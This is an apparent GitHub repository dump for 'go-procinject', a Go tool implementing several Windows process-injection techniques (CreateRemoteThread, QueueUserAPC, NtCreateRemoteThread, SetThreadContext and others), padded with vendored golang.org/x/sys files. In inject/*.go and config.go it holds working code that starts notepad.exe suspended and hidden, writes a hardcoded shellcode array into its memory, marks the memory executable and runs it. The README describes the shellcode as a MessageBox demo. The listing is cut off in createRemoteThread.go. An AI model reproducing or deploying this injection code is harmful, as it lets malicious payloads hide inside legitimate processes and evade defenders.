├── example.png ├── go.mod ├── vendor ├── modules.txt └── golang.org │ └── x │ └── sys │ ├── AUTHORS │ ├── CONTRIBUTORS │ ├── windows │ ├── empty.s │ ├── aliases.go │ ├── mksyscall.go │ ├── race0.go │ ├── types_windows_386.go │ ├── types_windows_amd64.go │ ├── types_windows_arm.go │ ├── str.go │ ├── race.go │ ├── memory_windows.go │ ├── eventlog.go │ ├── env_windows.go │ ├── mkknownfolderids.bash │ ├── mkerrors.bash │ ├── exec_windows.go │ ├── syscall.go │ ├── service.go │ ├── dll_windows.go │ ├── zknownfolderids_windows.go │ ├── security_windows.go │ └── types_windows.go │ ├── internal │ └── unsafeheader │ │ └── unsafeheader.go │ ├── PATENTS │ └── LICENSE ├── inject ├── process.go ├── queueUserAPC.go ├── createRemoteThread.go ├── setThreadContextC.go ├── rtlCreateUserThread.go ├── ntQueueUserAPC.go ├── ntCreateRemoteThread.go └── setThreadContext.go ├── README.md ├── main.go └── config └── config.go /example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/neox41/go-procinject/HEAD/example.png -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module go-procinject 2 | 3 | go 1.13 4 | 5 | require golang.org/x/sys v0.0.0-20200523222454-059865788121 6 | -------------------------------------------------------------------------------- /vendor/modules.txt: -------------------------------------------------------------------------------- 1 | # golang.org/x/sys v0.0.0-20200523222454-059865788121 2 | golang.org/x/sys/internal/unsafeheader 3 | golang.org/x/sys/windows 4 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/AUTHORS: -------------------------------------------------------------------------------- 1 | # This source code refers to The Go Authors for copyright purposes. 2 | # The master list of authors is in the main Go distribution, 3 | # visible at http://tip.golang.org/AUTHORS. 4 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/CONTRIBUTORS: -------------------------------------------------------------------------------- 1 | # This source code was written by the Go contributors. 2 | # The master list of contributors is in the main Go distribution, 3 | # visible at http://tip.golang.org/CONTRIBUTORS. 4 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/empty.s: -------------------------------------------------------------------------------- 1 | // Copyright 2019 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build !go1.12 6 | 7 | // This file is here to allow bodyless functions with go:linkname for Go 1.11 8 | // and earlier (see https://golang.org/issue/23311). 9 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/aliases.go: -------------------------------------------------------------------------------- 1 | // Copyright 2018 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build windows 6 | // +build go1.9 7 | 8 | package windows 9 | 10 | import "syscall" 11 | 12 | type Errno = syscall.Errno 13 | type SysProcAttr = syscall.SysProcAttr 14 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/mksyscall.go: -------------------------------------------------------------------------------- 1 | // Copyright 2009 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build generate 6 | 7 | package windows 8 | 9 | //go:generate go run golang.org/x/sys/windows/mkwinsyscall -output zsyscall_windows.go eventlog.go service.go syscall_windows.go security_windows.go 10 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/race0.go: -------------------------------------------------------------------------------- 1 | // Copyright 2012 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build windows,!race 6 | 7 | package windows 8 | 9 | import ( 10 | "unsafe" 11 | ) 12 | 13 | const raceenabled = false 14 | 15 | func raceAcquire(addr unsafe.Pointer) { 16 | } 17 | 18 | func raceReleaseMerge(addr unsafe.Pointer) { 19 | } 20 | 21 | func raceReadRange(addr unsafe.Pointer, len int) { 22 | } 23 | 24 | func raceWriteRange(addr unsafe.Pointer, len int) { 25 | } 26 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/types_windows_386.go: -------------------------------------------------------------------------------- 1 | // Copyright 2011 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | package windows 6 | 7 | type WSAData struct { 8 | Version uint16 9 | HighVersion uint16 10 | Description [WSADESCRIPTION_LEN + 1]byte 11 | SystemStatus [WSASYS_STATUS_LEN + 1]byte 12 | MaxSockets uint16 13 | MaxUdpDg uint16 14 | VendorInfo *byte 15 | } 16 | 17 | type Servent struct { 18 | Name *byte 19 | Aliases **byte 20 | Port uint16 21 | Proto *byte 22 | } 23 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/types_windows_amd64.go: -------------------------------------------------------------------------------- 1 | // Copyright 2011 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | package windows 6 | 7 | type WSAData struct { 8 | Version uint16 9 | HighVersion uint16 10 | MaxSockets uint16 11 | MaxUdpDg uint16 12 | VendorInfo *byte 13 | Description [WSADESCRIPTION_LEN + 1]byte 14 | SystemStatus [WSASYS_STATUS_LEN + 1]byte 15 | } 16 | 17 | type Servent struct { 18 | Name *byte 19 | Aliases **byte 20 | Proto *byte 21 | Port uint16 22 | } 23 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/types_windows_arm.go: -------------------------------------------------------------------------------- 1 | // Copyright 2018 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | package windows 6 | 7 | type WSAData struct { 8 | Version uint16 9 | HighVersion uint16 10 | Description [WSADESCRIPTION_LEN + 1]byte 11 | SystemStatus [WSASYS_STATUS_LEN + 1]byte 12 | MaxSockets uint16 13 | MaxUdpDg uint16 14 | VendorInfo *byte 15 | } 16 | 17 | type Servent struct { 18 | Name *byte 19 | Aliases **byte 20 | Port uint16 21 | Proto *byte 22 | } 23 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/str.go: -------------------------------------------------------------------------------- 1 | // Copyright 2009 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build windows 6 | 7 | package windows 8 | 9 | func itoa(val int) string { // do it here rather than with fmt to avoid dependency 10 | if val < 0 { 11 | return "-" + itoa(-val) 12 | } 13 | var buf [32]byte // big enough for int64 14 | i := len(buf) - 1 15 | for val >= 10 { 16 | buf[i] = byte(val%10 + '0') 17 | i-- 18 | val /= 10 19 | } 20 | buf[i] = byte(val + '0') 21 | return string(buf[i:]) 22 | } 23 | -------------------------------------------------------------------------------- /inject/process.go: -------------------------------------------------------------------------------- 1 | package inject 2 | 3 | import ( 4 | "golang.org/x/sys/windows" 5 | "syscall" 6 | 7 | "go-procinject/config" 8 | ) 9 | 10 | func CreateProcess() *syscall.ProcessInformation{ 11 | var si syscall.StartupInfo 12 | var pi syscall.ProcessInformation 13 | 14 | commandLine, err := syscall.UTF16PtrFromString(config.Target) 15 | 16 | if err != nil { 17 | panic(err) 18 | } 19 | 20 | err = syscall.CreateProcess( 21 | nil, 22 | commandLine, 23 | nil, 24 | nil, 25 | false, 26 | windows.CREATE_SUSPENDED | windows.CREATE_NO_WINDOW, 27 | nil, 28 | nil, 29 | &si, 30 | &pi) 31 | 32 | if err != nil { 33 | panic(err) 34 | } 35 | 36 | return &pi 37 | } 38 | 39 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/race.go: -------------------------------------------------------------------------------- 1 | // Copyright 2012 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build windows,race 6 | 7 | package windows 8 | 9 | import ( 10 | "runtime" 11 | "unsafe" 12 | ) 13 | 14 | const raceenabled = true 15 | 16 | func raceAcquire(addr unsafe.Pointer) { 17 | runtime.RaceAcquire(addr) 18 | } 19 | 20 | func raceReleaseMerge(addr unsafe.Pointer) { 21 | runtime.RaceReleaseMerge(addr) 22 | } 23 | 24 | func raceReadRange(addr unsafe.Pointer, len int) { 25 | runtime.RaceReadRange(addr, len) 26 | } 27 | 28 | func raceWriteRange(addr unsafe.Pointer, len int) { 29 | runtime.RaceWriteRange(addr, len) 30 | } 31 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # go-procinject 2 | 3 | Repository with some process injection techniques implemented in Golang. 4 | 5 | For each technique, the program does the following steps: 6 | 7 | 1. Create the target 32-bit process `C:\\Windows\\SysWOW64\\notepad.exe` in suspended and no window mode 8 | 2. Allocate RW memory to that target process 9 | 3. Write the 32-bit shellcode into that target process 10 | 4. Change the memory to RX 11 | 5. Execute the MessageBox shellcode 12 | 13 |

14 | 15 |

16 | 17 | ## Techniques 18 | 19 | - [x] CreateRemoteThread 20 | - [x] NtCreateRemoteThread 21 | - [x] QueueUserAPC 22 | - [x] NtQueueUserAPC 23 | - [x] RtlCreateUserThread 24 | - [x] SetThreadContext 25 | - [x] SetThreadContext with C code 26 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/memory_windows.go: -------------------------------------------------------------------------------- 1 | // Copyright 2017 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | package windows 6 | 7 | const ( 8 | MEM_COMMIT = 0x00001000 9 | MEM_RESERVE = 0x00002000 10 | MEM_DECOMMIT = 0x00004000 11 | MEM_RELEASE = 0x00008000 12 | MEM_RESET = 0x00080000 13 | MEM_TOP_DOWN = 0x00100000 14 | MEM_WRITE_WATCH = 0x00200000 15 | MEM_PHYSICAL = 0x00400000 16 | MEM_RESET_UNDO = 0x01000000 17 | MEM_LARGE_PAGES = 0x20000000 18 | 19 | PAGE_NOACCESS = 0x01 20 | PAGE_READONLY = 0x02 21 | PAGE_READWRITE = 0x04 22 | PAGE_WRITECOPY = 0x08 23 | PAGE_EXECUTE_READ = 0x20 24 | PAGE_EXECUTE_READWRITE = 0x40 25 | PAGE_EXECUTE_WRITECOPY = 0x80 26 | ) 27 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/eventlog.go: -------------------------------------------------------------------------------- 1 | // Copyright 2012 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // +build windows 6 | 7 | package windows 8 | 9 | const ( 10 | EVENTLOG_SUCCESS = 0 11 | EVENTLOG_ERROR_TYPE = 1 12 | EVENTLOG_WARNING_TYPE = 2 13 | EVENTLOG_INFORMATION_TYPE = 4 14 | EVENTLOG_AUDIT_SUCCESS = 8 15 | EVENTLOG_AUDIT_FAILURE = 16 16 | ) 17 | 18 | //sys RegisterEventSource(uncServerName *uint16, sourceName *uint16) (handle Handle, err error) [failretval==0] = advapi32.RegisterEventSourceW 19 | //sys DeregisterEventSource(handle Handle) (err error) = advapi32.DeregisterEventSource 20 | //sys ReportEvent(log Handle, etype uint16, category uint16, eventId uint32, usrSId uintptr, numStrings uint16, dataSize uint32, strings **uint16, rawData *byte) (err error) = advapi32.ReportEventW 21 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/internal/unsafeheader/unsafeheader.go: -------------------------------------------------------------------------------- 1 | // Copyright 2020 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // Package unsafeheader contains header declarations for the Go runtime's 6 | // slice and string implementations. 7 | // 8 | // This package allows x/sys to use types equivalent to 9 | // reflect.SliceHeader and reflect.StringHeader without introducing 10 | // a dependency on the (relatively heavy) "reflect" package. 11 | package unsafeheader 12 | 13 | import ( 14 | "unsafe" 15 | ) 16 | 17 | // Slice is the runtime representation of a slice. 18 | // It cannot be used safely or portably and its representation may change in a later release. 19 | type Slice struct { 20 | Data unsafe.Pointer 21 | Len int 22 | Cap int 23 | } 24 | 25 | // String is the runtime representation of a string. 26 | // It cannot be used safely or portably and its representation may change in a later release. 27 | type String struct { 28 | Data unsafe.Pointer 29 | Len int 30 | } 31 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "go-procinject/config" 7 | "go-procinject/inject" 8 | ) 9 | 10 | func main(){ 11 | var technique string 12 | flag.StringVar(&technique, "technique", "", "Process injection technique:\n" + 13 | "CreateRemoteThread\n" + 14 | "NtCreateRemoteThread\n" + 15 | "QueueUserAPC\n" + 16 | "NtQueueUserAPC\n" + 17 | "RtlCreateUserThread\n" + 18 | "SetThreadContext\n" + 19 | "SetThreadContextC\n") 20 | flag.Parse() 21 | 22 | switch technique{ 23 | case "CreateRemoteThread": 24 | inject.CreateRemoteThread(config.Shellcode) 25 | break 26 | case "NtCreateRemoteThread": 27 | inject.NtCreateRemoteThread(config.Shellcode) 28 | break 29 | case "QueueUserAPC": 30 | inject.QueueUserAPC(config.Shellcode) 31 | break 32 | case "NtQueueUserAPC": 33 | inject.NtQueueUserAPC(config.Shellcode) 34 | break 35 | case "RtlCreateUserThread": 36 | inject.RtlCreateUserThread(config.Shellcode) 37 | break 38 | case "SetThreadContext": 39 | inject.SetThreadContext(config.Shellcode) 40 | break 41 | case "SetThreadContextC": 42 | inject.SetThreadContextC(config.Shellcode) 43 | break 44 | default: 45 | fmt.Println("Invalid process injection technique") 46 | break 47 | } 48 | } -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/PATENTS: -------------------------------------------------------------------------------- 1 | Additional IP Rights Grant (Patents) 2 | 3 | "This implementation" means the copyrightable works distributed by 4 | Google as part of the Go project. 5 | 6 | Google hereby grants to You a perpetual, worldwide, non-exclusive, 7 | no-charge, royalty-free, irrevocable (except as stated in this section) 8 | patent license to make, have made, use, offer to sell, sell, import, 9 | transfer and otherwise run, modify and propagate the contents of this 10 | implementation of Go, where such license applies only to those patent 11 | claims, both currently owned or controlled by Google and acquired in 12 | the future, licensable by Google that are necessarily infringed by this 13 | implementation of Go. This grant does not include claims that would be 14 | infringed only as a consequence of further modification of this 15 | implementation. If you or your agent or exclusive licensee institute or 16 | order or agree to the institution of patent litigation against any 17 | entity (including a cross-claim or counterclaim in a lawsuit) alleging 18 | that this implementation of Go or any code incorporated within this 19 | implementation of Go constitutes direct or contributory patent 20 | infringement, or inducement of patent infringement, then any patent 21 | rights granted to you under this License for this implementation of Go 22 | shall terminate as of the date such litigation is filed. 23 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/env_windows.go: -------------------------------------------------------------------------------- 1 | // Copyright 2010 The Go Authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style 3 | // license that can be found in the LICENSE file. 4 | 5 | // Windows environment variables. 6 | 7 | package windows 8 | 9 | import ( 10 | "syscall" 11 | "unsafe" 12 | ) 13 | 14 | func Getenv(key string) (value string, found bool) { 15 | return syscall.Getenv(key) 16 | } 17 | 18 | func Setenv(key, value string) error { 19 | return syscall.Setenv(key, value) 20 | } 21 | 22 | func Clearenv() { 23 | syscall.Clearenv() 24 | } 25 | 26 | func Environ() []string { 27 | return syscall.Environ() 28 | } 29 | 30 | // Returns a default environment associated with the token, rather than the current 31 | // process. If inheritExisting is true, then this environment also inherits the 32 | // environment of the current process. 33 | func (token Token) Environ(inheritExisting bool) (env []string, err error) { 34 | var block *uint16 35 | err = CreateEnvironmentBlock(&block, token, inheritExisting) 36 | if err != nil { 37 | return nil, err 38 | } 39 | defer DestroyEnvironmentBlock(block) 40 | blockp := uintptr(unsafe.Pointer(block)) 41 | for { 42 | entry := UTF16PtrToString((*uint16)(unsafe.Pointer(blockp))) 43 | if len(entry) == 0 { 44 | break 45 | } 46 | env = append(env, entry) 47 | blockp += 2 * (uintptr(len(entry)) + 1) 48 | } 49 | return env, nil 50 | } 51 | 52 | func Unsetenv(key string) error { 53 | return syscall.Unsetenv(key) 54 | } 55 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/mkknownfolderids.bash: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright 2019 The Go Authors. All rights reserved. 4 | # Use of this source code is governed by a BSD-style 5 | # license that can be found in the LICENSE file. 6 | 7 | set -e 8 | shopt -s nullglob 9 | 10 | knownfolders="$(printf '%s\n' "/mnt/c/Program Files (x86)/Windows Kits/"/*/Include/*/um/KnownFolders.h | sort -Vr | head -n 1)" 11 | [[ -n $knownfolders ]] || { echo "Unable to find KnownFolders.h" >&2; exit 1; } 12 | 13 | { 14 | echo "// Code generated by 'mkknownfolderids.bash'; DO NOT EDIT." 15 | echo 16 | echo "package windows" 17 | echo "type KNOWNFOLDERID GUID" 18 | echo "var (" 19 | while read -r line; do 20 | [[ $line =~ DEFINE_KNOWN_FOLDER\((FOLDERID_[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+),[\t\ ]*(0x[^,]+)\) ]] || continue 21 | printf "%s = &KNOWNFOLDERID{0x%08x, 0x%04x, 0x%04x, [8]byte{0x%02x, 0x%02x, 0x%02x, 0x%02x, 0x%02x, 0x%02x, 0x%02x, 0x%02x}}\n" \ 22 | "${BASH_REMATCH[1]}" $(( "${BASH_REMATCH[2]}" )) $(( "${BASH_REMATCH[3]}" )) $(( "${BASH_REMATCH[4]}" )) \ 23 | $(( "${BASH_REMATCH[5]}" )) $(( "${BASH_REMATCH[6]}" )) $(( "${BASH_REMATCH[7]}" )) $(( "${BASH_REMATCH[8]}" )) \ 24 | $(( "${BASH_REMATCH[9]}" )) $(( "${BASH_REMATCH[10]}" )) $(( "${BASH_REMATCH[11]}" )) $(( "${BASH_REMATCH[12]}" )) 25 | done < "$knownfolders" 26 | echo ")" 27 | } | gofmt > "zknownfolderids_windows.go" 28 | -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2009 The Go Authors. All rights reserved. 2 | 3 | Redistribution and use in source and binary forms, with or without 4 | modification, are permitted provided that the following conditions are 5 | met: 6 | 7 | * Redistributions of source code must retain the above copyright 8 | notice, this list of conditions and the following disclaimer. 9 | * Redistributions in binary form must reproduce the above 10 | copyright notice, this list of conditions and the following disclaimer 11 | in the documentation and/or other materials provided with the 12 | distribution. 13 | * Neither the name of Google Inc. nor the names of its 14 | contributors may be used to endorse or promote products derived from 15 | this software without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 18 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 19 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 20 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 21 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 22 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 23 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 24 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 25 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | -------------------------------------------------------------------------------- /config/config.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | var ( 4 | Target = "C:\\Windows\\SysWOW64\\notepad.exe" 5 | Shellcode = []byte{ 0xd9, 0xeb, 0x9b, 0xd9, 0x74, 0x24, 0xf4, 0x31, 0xd2, 0xb2, 0x77, 0x31, 0xc9, 0x64, 0x8b, 0x71, 0x30, 0x8b, 0x76, 0x0c, 0x8b, 0x76, 0x1c, 0x8b, 0x46, 0x08, 0x8b, 0x7e, 0x20, 0x8b, 0x36, 0x38, 0x4f, 0x18, 0x75, 0xf3, 0x59, 0x01, 0xd1, 0xff, 0xe1, 0x60, 0x8b, 0x6c, 0x24, 0x24, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x28, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x34, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x3b, 0x7c, 0x24, 0x28, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3, 0xb2, 0x08, 0x29, 0xd4, 0x89, 0xe5, 0x89, 0xc2, 0x68, 0x8e, 0x4e, 0x0e, 0xec, 0x52, 0xe8, 0x9f, 0xff, 0xff, 0xff, 0x89, 0x45, 0x04, 0xbb, 0x7e, 0xd8, 0xe2, 0x73, 0x87, 0x1c, 0x24, 0x52, 0xe8, 0x8e, 0xff, 0xff, 0xff, 0x89, 0x45, 0x08, 0x68, 0x6c, 0x6c, 0x20, 0x41, 0x68, 0x33, 0x32, 0x2e, 0x64, 0x68, 0x75, 0x73, 0x65, 0x72, 0x30, 0xdb, 0x88, 0x5c, 0x24, 0x0a, 0x89, 0xe6, 0x56, 0xff, 0x55, 0x04, 0x89, 0xc2, 0x50, 0xbb, 0xa8, 0xa2, 0x4d, 0xbc, 0x87, 0x1c, 0x24, 0x52, 0xe8, 0x5f, 0xff, 0xff, 0xff, 0x68, 0x6f, 0x78, 0x58, 0x20, 0x68, 0x61, 0x67, 0x65, 0x42, 0x68, 0x4d, 0x65, 0x73, 0x73, 0x31, 0xdb, 0x88, 0x5c, 0x24, 0x0a, 0x89, 0xe3, 0x68, 0x65, 0x63, 0x74, 0x58, 0x68, 0x63, 0x69, 0x6e, 0x6a, 0x68, 0x2d, 0x70, 0x72, 0x6f, 0x68, 0x6d, 0x20, 0x67, 0x6f, 0x68, 0x20, 0x66, 0x72, 0x6f, 0x68, 0x43, 0x69, 0x61, 0x6f, 0x31, 0xc9, 0x88, 0x4c, 0x24, 0x17, 0x89, 0xe1, 0x31, 0xd2, 0x52, 0x53, 0x51, 0x52, 0xff, 0xd0, 0x31, 0xc0, 0x50, 0xff, 0x55, 0x08} 6 | ) -------------------------------------------------------------------------------- /vendor/golang.org/x/sys/windows/mkerrors.bash: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright 2019 The Go Authors. All rights reserved. 4 | # Use of this source code is governed by a BSD-style 5 | # license that can be found in the LICENSE file. 6 | 7 | set -e 8 | shopt -s nullglob 9 | 10 | winerror="$(printf '%s\n' "/mnt/c/Program Files (x86)/Windows Kits/"/*/Include/*/shared/winerror.h | sort -Vr | head -n 1)" 11 | [[ -n $winerror ]] || { echo "Unable to find winerror.h" >&2; exit 1; } 12 | 13 | declare -A errors 14 | 15 | { 16 | echo "// Code generated by 'mkerrors.bash'; DO NOT EDIT." 17 | echo 18 | echo "package windows" 19 | echo "import \"syscall\"" 20 | echo "const (" 21 | 22 | while read -r line; do 23 | unset vtype 24 | if [[ $line =~ ^#define\ +([A-Z0-9_]+k?)\ +([A-Z0-9_]+\()?([A-Z][A-Z0-9_]+k?)\)? ]]; then 25 | key="${BASH_REMATCH[1]}" 26 | value="${BASH_REMATCH[3]}" 27 | elif [[ $line =~ ^#define\ +([A-Z0-9_]+k?)\ +([A-Z0-9_]+\()?((0x)?[0-9A-Fa-f]+)L?\)? ]]; then 28 | key="${BASH_REMATCH[1]}" 29 | value="${BASH_REMATCH[3]}" 30 | vtype="${BASH_REMATCH[2]}" 31 | elif [[ $line =~ ^#define\ +([A-Z0-9_]+k?)\ +\(\(([A-Z]+)\)((0x)?[0-9A-Fa-f]+)L?\) ]]; then 32 | key="${BASH_REMATCH[1]}" 33 | value="${BASH_REMATCH[3]}" 34 | vtype="${BASH_REMATCH[2]}" 35 | else 36 | continue 37 | fi 38 | [[ -n $key && -n $value ]] || continue 39 | [[ -z ${errors["$key"]} ]] || continue 40 | errors["$key"]="$value" 41 | if [[ -v vtype ]]; then 42 | if [[ $key == FACILITY_* || $key == NO_ERROR ]]; then 43 | vtype="" 44 | elif [[ $vtype == *HANDLE* || $vtype == *HRESULT* ]]; then 45 | vtype="Handle" 46 | else 47 | vtype="syscall.Errno" 48 | fi 49 | last_vtype="$vtype" 50 | else 51 | vtype="" 52 | if [[ $last_vtype == Handle && $value == NO_ERROR ]]; then 53 | value="S_OK" 54 | elif [[ $last_vtype == syscall.Errno && $value == NO_ERROR ]]; then 55 | value="ERROR_SUCCESS" 56 | fi 57 | fi 58 | 59 | echo "$key $vtype = $value" 60 | done < "$winerror" 61 | 62 | echo ")" 63 | } | gofmt > "zerrors_windows.go" 64 | -------------------------------------------------------------------------------- /inject/queueUserAPC.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package inject 4 | 5 | import ( 6 | "fmt" 7 | "log" 8 | "unsafe" 9 | 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | func QueueUserAPC(shellcode []byte) { 14 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 15 | virtualAllocEx := kernel32.NewProc("VirtualAllocEx") 16 | virtualProtectEx := kernel32.NewProc("VirtualProtectEx") 17 | writeProcessMemory := kernel32.NewProc("WriteProcessMemory") 18 | queueUserAPC := kernel32.NewProc("QueueUserAPC") 19 | resumeThread := kernel32.NewProc("ResumeThread") 20 | 21 | pi := CreateProcess() 22 | oldProtect := windows.PAGE_READWRITE 23 | 24 | lpBaseAddress, _, errVirtualAllocEx := virtualAllocEx.Call(uintptr(pi.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 25 | if errVirtualAllocEx.Error() != "The operation completed successfully." { 26 | log.Fatal(fmt.Sprintf("Error calling VirtualAllocEx:\r\n%s", errVirtualAllocEx.Error())) 27 | } 28 | 29 | _, _, errWriteProcessMemory := writeProcessMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0) 30 | if errWriteProcessMemory.Error() != "The operation completed successfully." { 31 | log.Fatal(fmt.Sprintf("Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 32 | } 33 | 34 | _, _, errVirtualProtectEx := virtualProtectEx.Call(uintptr(pi.Process), lpBaseAddress, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 35 | if errVirtualProtectEx.Error() != "The operation completed successfully." { 36 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 37 | } 38 | 39 | _, _, errQueueUserAPC := queueUserAPC.Call(lpBaseAddress, uintptr(pi.Thread), 0) 40 | if errQueueUserAPC.Error() != "The operation completed successfully." { 41 | log.Fatal(fmt.Sprintf("Error calling QueueUserAPC:\r\n%s", errQueueUserAPC.Error())) 42 | } 43 | 44 | _, _, errResumeThread := resumeThread.Call(uintptr(pi.Thread)) 45 | if errResumeThread.Error() != "The operation completed successfully." { 46 | log.Fatal(fmt.Sprintf("Error calling ResumeThread:\r\n%s", errResumeThread.Error())) 47 | } 48 | 49 | fmt.Println("INJECTED!") 50 | } 51 | -------------------------------------------------------------------------------- /inject/createRemoteThread.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package inject 4 | 5 | import ( 6 | "fmt" 7 | "log" 8 | "unsafe" 9 | 10 | "golang.org/x/sys/windows" 11 | ) 12 | 13 | func CreateRemoteThread(shellcode []byte) { 14 | 15 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 16 | virtualAllocEx := kernel32.NewProc("VirtualAllocEx") 17 | virtualProtectEx := kernel32.NewProc("VirtualProtectEx") 18 | writeProcessMemory := kernel32.NewProc("WriteProcessMemory") 19 | createRemoteThread := kernel32.NewProc("CreateRemoteThread") 20 | closeHandle := kernel32.NewProc("CloseHandle") 21 | 22 | pi := CreateProcess() 23 | oldProtect := windows.PAGE_READWRITE 24 | 25 | lpBaseAddress, _, errVirtualAllocEx := virtualAllocEx.Call(uintptr(pi.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 26 | if errVirtualAllocEx.Error() != "The operation completed successfully." { 27 | log.Fatal(fmt.Sprintf("Error calling VirtualAllocEx:\r\n%s", errVirtualAllocEx.Error())) 28 | } 29 | 30 | _, _, errWriteProcessMemory := writeProcessMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0) 31 | if errWriteProcessMemory.Error() != "The operation completed successfully." { 32 | log.Fatal(fmt.Sprintf("Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 33 | } 34 | 35 | _, _, errVirtualProtectEx := virtualProtectEx.Call(uintptr(pi.Process), lpBaseAddress, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, 